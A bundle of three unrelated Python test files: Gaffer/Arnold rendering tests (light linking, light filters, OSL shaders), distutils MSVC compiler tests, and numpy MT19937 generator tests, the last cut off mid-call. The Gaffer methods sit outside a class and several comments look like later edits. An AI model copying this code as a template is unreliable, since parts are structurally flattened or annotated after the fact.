	group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
	group["in"].addChild( GafferScene.ScenePlug( "in4" ) )

	evaluate = GafferScene.EvaluateLightLinks()

	render = GafferArnold.ArnoldRender()

	# Only sphere1 gets the linking attributes; sphere2 is left untouched.
	attributes["in"].setInput( sphere1["out"] )
	arnoldAttributes["in"].setInput( attributes["out"] )
	group["in"]["in1"].setInput( arnoldAttributes["out"] )
	group["in"]["in2"].setInput( light1["out"] )
	group["in"]["in3"].setInput( light2["out"] )
	group["in"]["in4"].setInput( sphere2["out"] )
	evaluate["in"].setInput( group["out"] )
	render["in"].setInput( evaluate["out"] )

	# Illumination
	attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
	attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )

	# Shadows
	arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
	arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light /group/light1" )

	# make sure we pass correct data into the renderer
	self.assertEqual(
		set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
		set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
	)

	self.assertEqual(
		set( render["in"].attributes( "/group/sphere" )["ai:visibility:shadow_group"] ),
		set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
	)

	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
	render["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )

		# the first sphere had linked lights
		sphere = arnold.AiNodeLookUpByName( "/group/sphere" )

		# check illumination
		lights = arnold.AiNodeGetArray( sphere, "light_group" )
		lightNames = []
		for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
			# `light_group` holds AtNode pointers, so cast to read the name.
			light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
			lightNames.append( arnold.AiNodeGetName(light.contents) )

		doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )

		self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
		self.assertEqual( doLinking, True )

		# check shadows
		shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
		lightNames = []
		for i in range( arnold.AiArrayGetNumElements( shadows.contents ) ):
			light = arnold.cast(arnold.AiArrayGetPtr(shadows, i), arnold.POINTER(arnold.AtNode))
			lightNames.append( arnold.AiNodeGetName(light.contents) )

		doLinking = arnold.AiNodeGetBool( sphere, "use_shadow_group" )

		self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
		self.assertEqual( doLinking, True )

		# the second sphere does not have any light linking enabled
		sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )

		# check illumination
		lights = arnold.AiNodeGetArray( sphere1, "light_group" )
		lightNames = []
		for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
			light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
			lightNames.append( arnold.AiNodeGetName(light.contents) )

		doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )

		self.assertEqual( lightNames, [] )
		self.assertEqual( doLinking, False )

		# check shadows
		shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
		lightNames = []
		for i in range( arnold.AiArrayGetNumElements( shadows.contents ) ):
			light = arnold.cast(arnold.AiArrayGetPtr(shadows, i), arnold.POINTER(arnold.AtNode))
			lightNames.append( arnold.AiNodeGetName(light.contents) )

		doLinking = arnold.AiNodeGetBool( sphere1, "use_shadow_group" )

		self.assertEqual( lightNames, [] )
		self.assertEqual( doLinking, False )
def testNoLinkedLightsOnLights( self ) :

	# A mesh light's own geometry must not receive light linking, even
	# when linking is active elsewhere in the scene.

	sphere = GafferScene.Sphere()

	meshLightShader = GafferArnold.ArnoldShader()
	meshLightShader.loadShader( "flat" )

	meshLightFilter = GafferScene.PathFilter()
	meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )

	meshLight = GafferArnold.ArnoldMeshLight()
	meshLight["in"].setInput( sphere["out"] )
	meshLight["filter"].setInput( meshLightFilter["out"] )
	meshLight["parameters"]["color"].setInput( meshLightShader["out"] )

	light1 = GafferArnold.ArnoldLight()
	light1.loadShader( "point_light" )

	light2 = GafferArnold.ArnoldLight()
	light2.loadShader( "point_light" )

	# Trigger light linking by unlinking a light
	light2["defaultLight"].setValue( False )

	group = GafferScene.Group()

	group["in"][0].setInput( meshLight["out"] )
	group["in"][1].setInput( light1["out"] )
	group["in"][2].setInput( light2["out"] )

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( group["out"] )
	render["mode"].setValue( render.Mode.SceneDescriptionMode )
	render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	render["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )

		sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
		self.assertIsNotNone( sphere )

		# The mesh light geometry itself has no light links.
		self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
		self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :

	# A light should end up with both its linked light filter and its
	# assigned gobo shader in its Arnold `filters` array.

	s = Gaffer.ScriptNode()

	s["lightFilter"] = GafferArnold.ArnoldLightFilter()
	s["lightFilter"].loadShader( "light_blocker" )

	# Link the filter to all default lights.
	s["attributes"] = GafferScene.StandardAttributes()
	s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
	s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
	s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )

	s["light"] = GafferArnold.ArnoldLight()
	s["light"].loadShader( "point_light" )

	# Assign a gobo shader directly to the light.
	s["gobo"] = GafferArnold.ArnoldShader()
	s["gobo"].loadShader( "gobo" )

	s["assignment"] = GafferScene.ShaderAssignment()
	s["assignment"]["in"].setInput( s["light"]["out"] )
	s["assignment"]["shader"].setInput( s["gobo"]["out"] )

	s["group"] = GafferScene.Group()
	s["group"]["in"][0].setInput( s["attributes"]["out"] )
	s["group"]["in"][1].setInput( s["assignment"]["out"] )

	s["render"] = GafferArnold.ArnoldRender()
	s["render"]["in"].setInput( s["group"]["out"] )
	s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
	s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )

	s["render"]["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )

		light = arnold.AiNodeLookUpByName( "light:/group/light" )
		linkedFilters = arnold.AiNodeGetArray( light, "filters" )
		numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )

		# One light blocker plus one gobo.
		self.assertEqual( numFilters, 2 )

		linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
		linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))

		self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
		# We don't care about the exact name of the gobo which contains a hash
		goboName = arnold.AiNodeGetName( linkedGobo )
		self.assertTrue( goboName.startswith( "shader:" ) and goboName.endswith( ":gobo" ) )
def testLightFiltersMany( self ) :

	# \todo: this can easily be turned into a performance test

	# 100 instanced light filters linked to 100 instanced lights : every
	# light should end up with all 100 filters attached.

	s = Gaffer.ScriptNode()

	s["lightFilter"] = GafferArnold.ArnoldLightFilter()
	s["lightFilter"].loadShader( "light_blocker" )
	s["lightFilter"]["filteredLights"].setValue( "defaultLights" )

	# 10x10 grid of filter instances.
	s["planeFilters"] = GafferScene.Plane( "Plane" )
	s["planeFilters"]["divisions"].setValue( imath.V2i( 9 ) )

	s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
	s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
	s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
	s["instancerFilters"]["parent"].setValue( "/plane" )

	s["light"] = GafferArnold.ArnoldLight()
	s["light"].loadShader( "point_light" )

	# 10x10 grid of light instances.
	s["planeLights"] = GafferScene.Plane( "Plane" )
	s["planeLights"]["divisions"].setValue( imath.V2i( 9 ) )

	s["instancerLights"] = GafferScene.Instancer( "Instancer" )
	s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
	s["instancerLights"]["instances"].setInput( s["light"]["out"] )
	s["instancerLights"]["parent"].setValue( "/plane" )

	s["group"] = GafferScene.Group( "Group" )
	s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
	s["group"]["in"][1].setInput( s["instancerLights"]["out"] )

	s["render"] = GafferArnold.ArnoldRender()
	s["render"]["in"].setInput( s["group"]["out"] )
	s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
	s["render"]["fileName"].setValue( self.temporaryDirectory() + "/testMany.ass" )

	s["render"]["task"].execute()

	with IECoreArnold.UniverseBlock( writable = True ) :

		# Fixed : removed a leftover Python-2-only debug `print` statement
		# (and the temporary it printed), which was a syntax error under
		# Python 3.
		arnold.AiASSLoad( self.temporaryDirectory() + "/testMany.ass" )

		for i in range( 100 ) :
			light = arnold.AiNodeLookUpByName( "light:/group/plane1/instances/light/%s" % i )
			linkedFilters = arnold.AiNodeGetArray( light, "filters" )
			numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )

			self.assertEqual( numFilters, 100 )
def testAbortRaises( self ) :

	# An error during rendering should surface as a RuntimeError
	# mentioning "Render aborted" from `execute()`.

	s = Gaffer.ScriptNode()

	s["plane"] = GafferScene.Plane()
	# Presumably positions the plane in view so the bad texture is
	# actually read during shading - TODO confirm.
	s["plane"]["transform"]["translate"]["z"].setValue( -10 )

	s["shader"] = GafferArnold.ArnoldShader()
	s["shader"].loadShader( "image" )
	# Missing texture should cause render to abort
	s["shader"]["parameters"]["filename"].setValue( "iDontExist" )

	s["filter"] = GafferScene.PathFilter()
	s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )

	s["shaderAssignment"] = GafferScene.ShaderAssignment()
	s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
	s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
	s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )

	s["outputs"] = GafferScene.Outputs()
	s["outputs"].addOutput(
		"beauty",
		IECoreScene.Output(
			self.temporaryDirectory() + "/test.tif",
			"tiff",
			"rgba",
			{}
		)
	)
	s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )

	s["render"] = GafferArnold.ArnoldRender()
	s["render"]["in"].setInput( s["outputs"]["out"] )

	self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :

	# Render a shader ball through a small OSL network : a blue colour is
	# swizzled down to its "b" channel, then packed into the first ("in1")
	# component of a colour - so the rendered ball should be pure red.

	swizzle = GafferOSL.OSLShader()
	swizzle.loadShader( "MaterialX/mx_swizzle_color_float" )
	swizzle["parameters"]["in"].setValue( imath.Color3f( 0, 0, 1 ) )
	swizzle["parameters"]["channels"].setValue( "b" )

	pack = GafferOSL.OSLShader()
	pack.loadShader( "MaterialX/mx_pack_color" )
	pack["parameters"]["in1"].setInput( swizzle["out"]["out"] )

	ball = GafferArnold.ArnoldShaderBall()
	ball["shader"].setInput( pack["out"] )

	# Render to an in-memory display driver so we can sample the result.
	outputs = GafferScene.Outputs()
	outputs.addOutput(
		"beauty",
		IECoreScene.Output(
			"test",
			"ieDisplay",
			"rgba",
			{
				"driverType" : "ImageDisplayDriver",
				"handle" : "myLovelySphere",
			}
		)
	)
	outputs["in"].setInput( ball["out"] )

	render = GafferArnold.ArnoldRender()
	render["in"].setInput( outputs["out"] )
	render["task"].execute()

	image = IECoreImage.ImageDisplayDriver.storedImage( "myLovelySphere" )
	self.assertTrue( isinstance( image, IECoreImage.ImagePrimitive ) )

	# Sample the centre of the ball.
	self.assertEqual( self.__color4fAtUV( image, imath.V2f( 0.5 ) ), imath.Color4f( 1, 0, 0, 1 ) )
def __color4fAtUV( self, image, uv ) :

	# Sample `image` at the normalised coordinate `uv`, returning
	# the colour as a Color4f.

	converter = GafferImage.ObjectToImage()
	converter["object"].setValue( image )

	windowSize = image.displayWindow.size()
	pixelPosition = uv * imath.V2f( windowSize.x, windowSize.y )

	pixelSampler = GafferImage.ImageSampler()
	pixelSampler["image"].setInput( converter["out"] )
	pixelSampler["pixel"].setValue( pixelPosition )

	return pixelSampler["color"].getValue()
def __arrayToSet( self, a ) :

	# Convert an Arnold string array into a Python set of strings.
	# Raises TypeError if a non-empty array holds any other type.

	elements = set()
	for index in range( arnold.AiArrayGetNumElements( a.contents ) ) :
		if arnold.AiArrayGetType( a.contents ) != arnold.AI_TYPE_STRING :
			raise TypeError
		elements.add( arnold.AiArrayGetStr( a, index ) )

	return elements
if __name__ == "__main__":
	# Allow this test file to be run directly.
	unittest.main()
|
test_msvccompiler.py | """Tests for distutils._msvccompiler."""
import sys
import unittest
import os
import threading
from distutils.errors import DistutilsPlatformError
from distutils.tests import support
from test.support import run_unittest
# Skip reason for non-Windows platforms; None means "run the tests".
if sys.platform == "win32":
    SKIP_MESSAGE = None
else:
    SKIP_MESSAGE = "These tests are only for win32"
@unittest.skipUnless(SKIP_MESSAGE is None, SKIP_MESSAGE)
class msvccompilerTestCase(support.TempdirManager,
                           unittest.TestCase):
    """Win32-only tests for distutils._msvccompiler environment discovery."""

    def test_no_compiler(self):
        import distutils._msvccompiler as _msvccompiler
        # makes sure query_vcvarsall raises
        # a DistutilsPlatformError if the compiler
        # is not found
        def _find_vcvarsall(plat_spec):
            return None, None

        old_find_vcvarsall = _msvccompiler._find_vcvarsall
        _msvccompiler._find_vcvarsall = _find_vcvarsall
        try:
            self.assertRaises(DistutilsPlatformError,
                              _msvccompiler._get_vc_env,
                              'wont find this version')
        finally:
            # Restore the real lookup even if the assertion failed.
            _msvccompiler._find_vcvarsall = old_find_vcvarsall

    def test_get_vc_env_unicode(self):
        # Non-ASCII environment variables must survive the round trip
        # through vcvarsall.
        import distutils._msvccompiler as _msvccompiler

        test_var = 'ṰḖṤṪ┅ṼẨṜ'
        test_value = '₃⁴₅'

        # Ensure we don't early exit from _get_vc_env
        old_distutils_use_sdk = os.environ.pop('DISTUTILS_USE_SDK', None)
        os.environ[test_var] = test_value
        try:
            env = _msvccompiler._get_vc_env('x86')
            # _get_vc_env lower-cases the keys it returns.
            self.assertIn(test_var.lower(), env)
            self.assertEqual(test_value, env[test_var.lower()])
        finally:
            os.environ.pop(test_var)
            if old_distutils_use_sdk:
                os.environ['DISTUTILS_USE_SDK'] = old_distutils_use_sdk

    def test_get_vc2017(self):
        import distutils._msvccompiler as _msvccompiler

        # This function cannot be mocked, so pass it if we find VS 2017
        # and mark it skipped if we do not.
        version, path = _msvccompiler._find_vc2017()
        if version:
            self.assertGreaterEqual(version, 15)
            self.assertTrue(os.path.isdir(path))
        else:
            raise unittest.SkipTest("VS 2017 is not installed")

    def test_get_vc2015(self):
        import distutils._msvccompiler as _msvccompiler

        # This function cannot be mocked, so pass it if we find VS 2015
        # and mark it skipped if we do not.
        version, path = _msvccompiler._find_vc2015()
        if version:
            self.assertGreaterEqual(version, 14)
            self.assertTrue(os.path.isdir(path))
        else:
            raise unittest.SkipTest("VS 2015 is not installed")
class CheckThread(threading.Thread):
    """Thread that records any exception raised by its target.

    The thread is truthy when its target completed without raising,
    falsy otherwise; `exc_info` holds the captured exception triple.
    """

    exc_info = None

    def run(self):
        try:
            super().run()
        except Exception:
            self.exc_info = sys.exc_info()

    def __bool__(self):
        return self.exc_info is None
class TestSpawn(unittest.TestCase):
    def test_concurrent_safe(self):
        """
        Concurrent calls to spawn should have consistent results.
        """
        import distutils._msvccompiler as _msvccompiler

        compiler = _msvccompiler.MSVCCompiler()
        # Every spawned child must see exactly this PATH, even with 100
        # threads racing through `spawn` at once.
        compiler._paths = "expected"
        inner_cmd = 'import os; assert os.environ["PATH"] == "expected"'
        command = ['python', '-c', inner_cmd]

        threads = [
            CheckThread(target=compiler.spawn, args=[command])
            for n in range(100)
        ]
        for thread in threads:
            thread.start()
        for thread in threads:
            thread.join()
        # CheckThread is falsy when its target raised.
        assert all(threads)
def test_suite():
    # Suite entry point used by the distutils test runner; contains only
    # the win32-gated compiler tests.
    return unittest.makeSuite(msvccompilerTestCase)
if __name__ == "__main__":
    # Run the suite directly via test.support's runner.
    run_unittest(test_suite())
|
test_generator_mt19937.py | import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
# Reference data for MT19937 jump tests : SHA256 digests of the state key
# plus the `pos` counter, before ("initial") and after ("jumped") a jump,
# for several seeds and step counts. Presumably consumed by a jumped()
# test elsewhere in this file - verify against that consumer.
JUMP_TEST_DATA = [
    {
        "seed": 0,
        "steps": 10,
        "initial": {"key_sha256": "bb1636883c2707b51c5b7fc26c6927af4430f2e0785a8c7bc886337f919f9edf", "pos": 9},
        "jumped": {"key_sha256": "ff682ac12bb140f2d72fba8d3506cf4e46817a0db27aae1683867629031d8d55", "pos": 598},
    },
    {
        "seed":384908324,
        "steps":312,
        "initial": {"key_sha256": "16b791a1e04886ccbbb4d448d6ff791267dc458ae599475d08d5cced29d11614", "pos": 311},
        "jumped": {"key_sha256": "a0110a2cf23b56be0feaed8f787a7fc84bef0cb5623003d75b26bdfa1c18002c", "pos": 276},
    },
    {
        "seed": [839438204, 980239840, 859048019, 821],
        "steps": 511,
        "initial": {"key_sha256": "d306cf01314d51bd37892d874308200951a35265ede54d200f1e065004c3e9ea", "pos": 510},
        "jumped": {"key_sha256": "0e00ab449f01a5195a83b4aee0dfbc2ce8d46466a640b92e33977d2e42f777f8", "pos": 475},
    },
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
    # Module-scoped parametrised fixture : dependent tests run once with
    # endpoint=True and once with endpoint=False.
    return request.param
class TestSeed:
    """Seeding behaviour of Generator(MT19937(...))."""

    def test_scalar(self):
        # Known first draws for scalar seeds at both ends of the range.
        gen = Generator(MT19937(0))
        assert_equal(gen.integers(1000), 479)
        gen = Generator(MT19937(4294967295))
        assert_equal(gen.integers(1000), 324)

    def test_array(self):
        # Sequence seeds : equivalent seeds give equal streams, and
        # single-element sequences match the scalar results above.
        cases = (
            (range(10), 465),
            (np.arange(10), 465),
            ([0], 479),
            ([4294967295], 324),
        )
        for seed, expected in cases:
            assert_equal(Generator(MT19937(seed)).integers(1000), expected)

    def test_seedsequence(self):
        bit_generator = MT19937(SeedSequence(0))
        assert_equal(bit_generator.random_raw(1), 2058676884)

    def test_invalid_scalar(self):
        # seed must be an unsigned 32 bit integer
        assert_raises(TypeError, MT19937, -0.5)
        assert_raises(ValueError, MT19937, -1)

    def test_invalid_array(self):
        # seed entries must be unsigned integers
        assert_raises(TypeError, MT19937, [-0.5])
        for bad_seed in ([-1], [1, -2, 4294967296]):
            assert_raises(ValueError, MT19937, bad_seed)

    def test_noninstantized_bitgen(self):
        # Generator requires a BitGenerator instance, not the class.
        assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
    """Corner cases of the binomial distribution."""

    def test_n_zero(self):
        # binomial(0, p) must be identically zero for every p in [0, 1],
        # for scalar and array n alike. Regression test for issue #3480.
        zero_counts = np.zeros(2, dtype='int')
        for probability in (0, .5, 1):
            assert_(random.binomial(0, probability) == 0)
            assert_array_equal(random.binomial(zero_counts, probability), zero_counts)

    def test_p_is_nan(self):
        # Issue #4571 : a nan probability must be rejected.
        assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
    """Argument handling and output shapes of Generator.multinomial."""

    def test_basic(self):
        # Smoke test : a simple draw must not raise.
        random.multinomial(100, [0.2, 0.8])

    def test_zero_probability(self):
        # Zero-probability categories are legal.
        random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])

    def test_int_negative_interval(self):
        # NOTE(review): exercises `integers` with a negative range rather
        # than multinomial - possibly misplaced in this class.
        assert_(-5 <= random.integers(-5, -1) < -1)
        x = random.integers(-5, -1, 5)
        assert_(np.all(-5 <= x))
        assert_(np.all(x < -1))

    def test_size(self):
        # gh-3173 : `size` may be an int, np integer, list, tuple or array,
        # but not a float.
        p = [0.5, 0.5]
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
        assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
        assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
                     (2, 2, 2))

        assert_raises(TypeError, random.multinomial, 1, p,
                      float(1))

    def test_invalid_prob(self):
        # Probabilities summing above one, or negative, are rejected.
        assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
        assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])

    def test_invalid_n(self):
        # Negative trial counts are rejected, scalar or array.
        assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
        assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])

    def test_p_non_contiguous(self):
        # Non-contiguous pvals must give the same stream as a contiguous
        # copy, given identical seeding.
        p = np.arange(15.)
        p /= np.sum(p[1::3])
        pvals = p[1::3]
        random = Generator(MT19937(1432985819))
        non_contig = random.multinomial(100, pvals=pvals)
        random = Generator(MT19937(1432985819))
        contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
        assert_array_equal(non_contig, contig)

    def test_multidimensional_pvals(self):
        # pvals must be one-dimensional.
        assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
        assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
        assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
        assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
    """Tests for Generator.multivariate_hypergeometric ('count' and
    'marginals' methods): validation, edge cases, shapes, and pinned
    regression streams."""

    def setup(self):
        # NOTE(review): nose-style `setup` is deprecated under modern
        # pytest; `setup_method` is the supported spelling — confirm the
        # project's pytest version before renaming.
        self.seed = 8675309

    def test_argument_validation(self):
        # Error cases...

        # `colors` must be a 1-d sequence
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      10, 4)

        # Negative nsample
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], -1)

        # Negative color
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [-1, 2, 3], 2)

        # nsample exceeds sum(colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [2, 3, 4], 10)

        # nsample exceeds sum(colors) (edge case of empty colors)
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [], 1)

        # Validation errors associated with very large values in colors.
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [999999999, 101], 5, 1, 'marginals')

        int64_info = np.iinfo(np.int64)
        max_int64 = int64_info.max
        max_int64_index = max_int64 // int64_info.dtype.itemsize
        assert_raises(ValueError, random.multivariate_hypergeometric,
                      [max_int64_index - 100, 101], 5, 1, 'count')

    @pytest.mark.parametrize('method', ['count', 'marginals'])
    def test_edge_cases(self, method):
        # Set the seed, but in fact, all the results in this test are
        # deterministic, so we don't really need this.
        random = Generator(MT19937(self.seed))

        # Empty and zero-sample draws are all fully determined.
        x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        x = random.multivariate_hypergeometric([], 0, method=method)
        assert_array_equal(x, [])

        x = random.multivariate_hypergeometric([], 0, size=1, method=method)
        assert_array_equal(x, np.empty((1, 0), dtype=np.int64))

        x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
        assert_array_equal(x, [0, 0, 0])

        x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
        assert_array_equal(x, [3, 0, 0])

        # Drawing every item must return exactly `colors`.
        colors = [1, 1, 0, 1, 1]
        x = random.multivariate_hypergeometric(colors, sum(colors),
                                               method=method)
        assert_array_equal(x, colors)

        x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
                                               method=method)
        assert_array_equal(x, [[3, 4, 5]]*3)

    # Cases for nsample:
    #     nsample < 10
    #     10 <= nsample < colors.sum()/2
    #     colors.sum()/2 < nsample < colors.sum() - 10
    #     colors.sum() - 10 < nsample < colors.sum()
    @pytest.mark.parametrize('nsample', [8, 25, 45, 55])
    @pytest.mark.parametrize('method', ['count', 'marginals'])
    @pytest.mark.parametrize('size', [5, (2, 3), 150000])
    def test_typical_cases(self, nsample, method, size):
        random = Generator(MT19937(self.seed))

        colors = np.array([10, 5, 20, 25])
        sample = random.multivariate_hypergeometric(colors, nsample, size,
                                                    method=method)
        if isinstance(size, int):
            expected_shape = (size,) + colors.shape
        else:
            expected_shape = size + colors.shape
        assert_equal(sample.shape, expected_shape)
        # Per-category counts are bounded by the available colors.
        assert_((sample >= 0).all())
        assert_((sample <= colors).all())
        # Each draw must account for exactly nsample items.
        assert_array_equal(sample.sum(axis=-1),
                           np.full(size, fill_value=nsample, dtype=int))
        if isinstance(size, int) and size >= 100000:
            # This sample is large enough to compare its mean to
            # the expected values.
            assert_allclose(sample.mean(axis=0),
                            nsample * colors / colors.sum(),
                            rtol=1e-3, atol=0.005)

    def test_repeatability1(self):
        # Pinned regression stream for the 'count' method at this seed.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
                                                    method='count')
        expected = np.array([[2, 1, 2],
                             [2, 1, 2],
                             [1, 1, 3],
                             [2, 0, 3],
                             [2, 1, 2]])
        assert_array_equal(sample, expected)

    def test_repeatability2(self):
        # Pinned regression stream for the 'marginals' method, large nsample.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 50,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[ 9, 17, 24],
                             [ 7, 13, 30],
                             [ 9, 15, 26],
                             [ 9, 17, 24],
                             [12, 14, 24]])
        assert_array_equal(sample, expected)

    def test_repeatability3(self):
        # Pinned regression stream for the 'marginals' method, small nsample.
        random = Generator(MT19937(self.seed))
        sample = random.multivariate_hypergeometric([20, 30, 50], 12,
                                                    size=5,
                                                    method='marginals')
        expected = np.array([[2, 3, 7],
                             [5, 3, 4],
                             [2, 5, 5],
                             [5, 3, 4],
                             [1, 5, 6]])
        assert_array_equal(sample, expected)
class TestSetState:
    """Tests that restoring a saved bit-generator state replays the exact
    same stream, including the normal-distribution cache."""

    def setup(self):
        # NOTE(review): nose-style `setup` is deprecated in modern pytest;
        # the supported name is `setup_method` — confirm before renaming.
        self.seed = 1234567890
        self.rg = Generator(MT19937(self.seed))
        self.bit_generator = self.rg.bit_generator
        self.state = self.bit_generator.state
        # Legacy-style tuple view of the state: (name, key array, position).
        self.legacy_state = (self.state['bit_generator'],
                             self.state['state']['key'],
                             self.state['state']['pos'])

    def test_gaussian_reset(self):
        # Make sure the cached every-other-Gaussian is reset.
        old = self.rg.standard_normal(size=3)
        self.bit_generator.state = self.state
        new = self.rg.standard_normal(size=3)
        assert_(np.all(old == new))

    def test_gaussian_reset_in_media_res(self):
        # When the state is saved with a cached Gaussian, make sure the
        # cached Gaussian is restored.
        self.rg.standard_normal()
        state = self.bit_generator.state
        old = self.rg.standard_normal(size=3)
        self.bit_generator.state = state
        new = self.rg.standard_normal(size=3)
        assert_(np.all(old == new))

    def test_negative_binomial(self):
        # Ensure that the negative binomial results take floating point
        # arguments without truncation.
        self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
    """Tests for Generator.integers over every supported integer/bool dtype.

    Most tests take an ``endpoint`` argument; presumably this is a pytest
    fixture parametrized over [False, True] (half-open vs. closed interval)
    defined elsewhere in this module — confirm against the full file.
    """

    rfunc = random.integers

    # valid integer/boolean types
    itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
             np.int32, np.uint32, np.int64, np.uint64]

    def test_unsupported_type(self, endpoint):
        # Floating-point dtypes are rejected outright.
        assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)

    def test_bounds_checking(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # Out-of-range or inverted scalar bounds all raise ValueError.
            assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, ubnd, lbnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
                          dtype=dt)

            # Same checks with array-valued bounds.
            assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, 1, [0],
